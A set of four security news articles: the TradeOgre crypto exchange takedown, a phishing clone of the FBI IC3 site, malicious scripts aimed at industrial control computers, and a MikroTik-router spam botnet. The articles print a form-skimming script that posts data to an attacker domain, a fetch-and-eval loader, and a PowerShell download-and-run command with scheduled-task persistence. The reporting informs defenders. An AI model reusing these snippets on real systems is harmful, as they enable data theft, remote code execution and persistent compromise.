Canada’s law enforcement community has achieved a landmark victory in the fight against illicit finance with the dismantling of TradeOgre, a Tor-based cryptocurrency exchange that facilitated the theft and laundering of over 56 million dollars in digital assets.

Emerging in early 2023, TradeOgre operated entirely as a hidden service, leveraging the anonymity of the Tor network to avoid regulatory oversight and conceal the origin of illicit funds.

By eschewing Know Your Customer (KYC) protocols, the platform enabled users to trade Bitcoin, Monero, Ethereum and a variety of altcoins completely untraceably.

Initially marketed to privacy-minded traders as a decentralized marketplace, TradeOgre quickly became the go-to venue for cybercriminals seeking to move ransomware payments, darknet proceeds and stolen funds. Transactions were executed through a custom API interface, accessible only via a .onion address.

Royal Canadian Mounted Police identified anomalous traffic patterns and cluster-analysis indicators pointing to the platform’s involvement in high-value thefts, culminating in a 56-million-dollar seizure on September 18, 2025.

Behind the façade of privacy, TradeOgre’s backend relied on a suite of open-source components patched with proprietary scripts to automate order matching and deposit processing.

Although the code was never publicly released, investigators recovered fragments of shell and Python scripts used to orchestrate wallet hot-storage and mixing services, along with configuration files illustrating multi-hop proxy chaining.

Evading Detection Through Tor and Proxy Chaining

In its persistence tactics, TradeOgre employed a layered obfuscation strategy. The platform ran on a VM cluster within bullet-proof hosting, each node communicating over Tor circuits and randomized VPN endpoints.

Investigators recovered a fragment of a proxy setup script that demonstrates how TradeOgre maintained its hidden service:

# Proxy chaining for TradeOgre hidden service
sudo apt-get install tor privoxy
cat << EOF > /etc/privoxy/config
listen-address 127.0.0.1:8118
forward-socks5t   /               127.0.0.1:9050 .
EOF
systemctl restart privoxy
# Access API through Tor proxy
curl --socks5-hostname 127.0.0.1:9050 http://tradeogrehidden.onion/api/v1/markets

This multi-layered approach hindered attribution and complicated conventional threat-intelligence tracking, underscoring the challenge of combating darknet-enabled financial crime.

Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.

The post Canada Police Dismantles TradeOgre Platform That Stolen 56 Million Dollars in Cryptocurrency appeared first on Cyber Security News.

A sophisticated spoofing campaign has emerged targeting the Federal Bureau of Investigation’s Internet Crime Complaint Center (IC3).

Beginning in mid-September 2025, victims attempting to access IC3’s official portal were redirected to fraudulent domains crafted to mirror the legitimate site.

The impersonators employed look-alike URLs—such as “ic3-gov.com” and “ic3gov.org”—and reproduced authentic branding, including the FBI seal and IC3 banner.

Visitors who entered personal data found their information harvested for identity theft and financial fraud.

IC3 analysts identified the first wave of these fraudulent sites on September 18, 2025, when multiple reports surfaced of visitors receiving deceptive emails purportedly confirming IC3 report submissions.

Those messages contained links that led to cloned pages demanding extensive personally identifiable information (PII).

Although the initial entry point resembled a routine confirmation notice, the campaign’s underlying payload quietly exfiltrated all form data to attacker-controlled servers.

Following these early alerts, IC3 researchers noted that the spoofed infrastructure was hosted via bulletproof providers, enabling rapid domain rotation and minimal takedown capability.

Victims who attempted to “report” crimes or update existing reports unwittingly provided names, home addresses, phone numbers, email credentials, Social Security numbers, and banking information—all transmitted in clear text over HTTP.

In some cases, the cloned pages concealed additional JavaScript modules designed to capture keystrokes and cookies, further compromising visitor security.

Infection Mechanism and Data Harvesting

The malicious sites operate purely through phishing and client-side scripting. Upon loading, a JavaScript snippet intercepts the legitimate form’s submit event, rerouting user inputs to an exfiltration endpoint before allowing the browser to proceed or display a generic error.

A representative snippet illustrates this tactic:-

document.querySelector('form#complaintForm').addEventListener('submit', function(evt) {
  evt.preventDefault();
  var formData = new FormData(this);
  fetch('https://malicious-ic3[.]net/collect', {
    method: 'POST',
    body: formData
  }).then(() => this.submit());
});

This approach enables seamless data capture without alerting the victim. The script also logs keystrokes via an injected listener on all input fields, collecting credentials and session cookies.

Because the code is embedded directly in the page’s HTML, traditional antivirus solutions relying on signature-based detection struggle to flag the threat.

Subsequent network analysis revealed repeated POST requests to the malicious domain shortly after each form submission, confirming successful data exfiltration.

Professionals are urged to verify the URL, ensure HTTPS with a valid .gov certificate, and report any suspicious IC3-branded pages to the FBI immediately.

Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.

The post Threat Actors Impersonate FBI IC3 Website to Steal The Visitors’ Personal Information appeared first on Cyber Security News.

Industrial automation systems have become the latest battleground for sophisticated cybercriminals who are deploying cleverly crafted malicious scripts and phishing pages to compromise ICS computers.

Over the first half of 2025, attackers have increasingly shifted to web-based attack vectors, exploiting legacy interfaces, weak authentication, and outdated software in operational technology environments.

These threat actors deliver malicious JavaScript payloads via compromised websites and phishing emails that mimic legitimate vendor pages or internal dashboards.

Once a user interacts with the page, the script executes automatically, allowing the adversary to deliver next-stage payloads designed to extract credentials, establish backdoors, and move laterally within the network.

Detection data from Securelist indicates that the percentage of ICS computers on which malicious scripts and phishing pages were blocked reached 6.49% in Q2 2025, down slightly from the previous quarter.

Despite the modest decrease, this category remains the most prevalent web-based threat to industrial networks, surpassing traditional malware families such as trojans and keyloggers.

Regional analysis shows that Africa and South-East Asia saw the highest infection attempts, while Northern Europe remained the least targeted.

The decline in blocked scripts may reflect both improved defenses and the attackers’ pivot toward more targeted, low-volume campaigns.

Securelist analysts identified that many of these attacks leverage common industrial protocols—such as Modbus and OPC UA—to embed command sequences within ostensibly benign script hosts.

By masquerading control commands as part of a legitimate maintenance interface, threat actors can manipulate programmable logic controllers (PLCs) and supervisory control and data acquisition (SCADA) systems without triggering conventional antivirus signatures.

The attackers often chain multiple JavaScript modules: the initial loader script pulls a second-stage downloader, which in turn retrieves a lightweight reverse shell written in Node[.]js.

While most incidents involve credential harvesting and reconnaissance, several high-impact campaigns enabled direct manipulation of industrial processes.

In one case, adversaries altered setpoints on a chemical processing line, causing temperature fluctuations that triggered emergency shutdowns.

In another, attackers used phishing pages that mimicked a well-known remote support portal to steal privileged accounts, later deploying malicious scripts that disabled safety interlocks.

These operations underline the urgent need for deep-inspection proxies and multi-factor authentication on all ICS-facing web interfaces.

Infection Mechanism and Script Delivery

The initial infection typically begins with a phishing email containing a link to a cloned vendor portal. Upon visiting the page, a JavaScript snippet automatically downloads and executes from an offsite server:

[script]
// Loader fetches and executes the second-stage payload
fetch('http://malicious.example.com/loader.js')
  .then(response => response.text())
  .then(code => eval(code));
[/script]

The loader script then writes a Node[.]js-based shell to disk and registers it as a system service, ensuring persistence across reboots.

It also injects WebSocket hooks into the browser process to tunnel PLC commands through the existing network channel.

Evading detection is further achieved by obfuscating function names and encoding payloads in Base64, only decoding them at runtime.

Continuous monitoring of web gateway logs and implementing strict content security policies can disrupt this chain of execution and prevent unauthorized script retrieval.

Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.

The post Threat Actors Attacking ICS Computers With Malicious Scripts and Phishing Pages appeared first on Cyber Security News.

A previously unseen botnet campaign emerged in late November, using a novel combination of DNS misconfiguration and hijacked networking devices to propel a global malspam operation.

Initial reports surfaced when dozens of organizations received what appeared to be legitimate freight invoices, each containing a ZIP archive with a malicious JavaScript payload.

Upon execution, the script launched a PowerShell routine to connect to a remote command-and-control server at 62.133.60.137, a host with prior ties to Russian threat actors.

Infoblox analysts identified that the underlying infrastructure relies on more than 13,000 compromised MikroTik routers, transformed into open SOCKS4 proxies.

This expansive relay network not only amplifies email delivery volume but also obscures the true origin of attacks, making traditional IP-based filtering ineffective.

Instead of exploiting a single vulnerability, the campaign capitalizes on the default or poorly secured configurations shipped with many MikroTik devices.

The spam emails spoofed hundreds of legitimate domains by abusing misconfigured SPF records.

Domain owners had inadvertently—or through malicious alteration—configured their TXT records with the “all” directive, effectively allowing any mail server to send messages on their behalf.

The result was a widespread bypass of DKIM, SPF, and DMARC checks, enabling the malicious emails to slip past mail filters into corporate inboxes.

This botnet represents a material shift in large-scale spam operations, combining device compromise at the network layer with DNS-level manipulation.

Victims who opened the attached ZIP archives triggered an obfuscated JavaScript file that deployed the loader script, illustrating the seamless integration of multiple tactics to maximize infection rates and evade detection.

Infection Mechanism

The malware’s infection chain begins with an obfuscated JavaScript file inside a ZIP archive.

When run, the script writes and executes a PowerShell loader that reaches out to the C2 server to fetch further payloads.

The JavaScript code snippet below demonstrates how the PowerShell command is constructed and executed:-

var cmd = 'powershell -NoProfile -WindowStyle Hidden -Command ' +
          '"$wc = New-Object System.Net.WebClient; ' +
          '$wc.DownloadFile(\'http://62.133.60.137/payload.exe\', \'C:\\Users\\Public\\payload.exe\'); ' +
          'Start-Process \'C:\\Users\\Public\\payload.exe\'"';
WScript.Shell.Run(cmd, 0, true);

Once the loader is active, the PowerShell script validates its execution context by querying Get-ExecutionPolicy.

Should the policy restrict script runs, the malware temporarily bypasses restrictions using Set-ExecutionPolicy Bypass -Scope Process.

Next, it establishes persistence by creating a scheduled task named “Updater” that runs at user logon:-

$action = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument '-NoProfile -WindowStyle Hidden -File C:\Users\Public\payload.exe'
$trigger = New-ScheduledTaskTrigger -AtLogOn
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName 'Updater' -Description 'System Updater'

This mechanism ensures the payload remains active across reboots, while its network traffic is routed through the botnet’s SOCKS4 proxies.

The reliance on legitimate network services and legal DNS records blurs the line between benign and malicious activity, posing a significant challenge to defenders and underscoring the urgent need for rigorous DNS configuration audits and router security hardening.

Find this Story Interesting! Follow us on Google News, LinkedIn, and X to Get More Instant Updates.

The post New Botnet Leverages DNS Misconfiguration to Launch Massive Cyber Attack appeared first on Cyber Security News.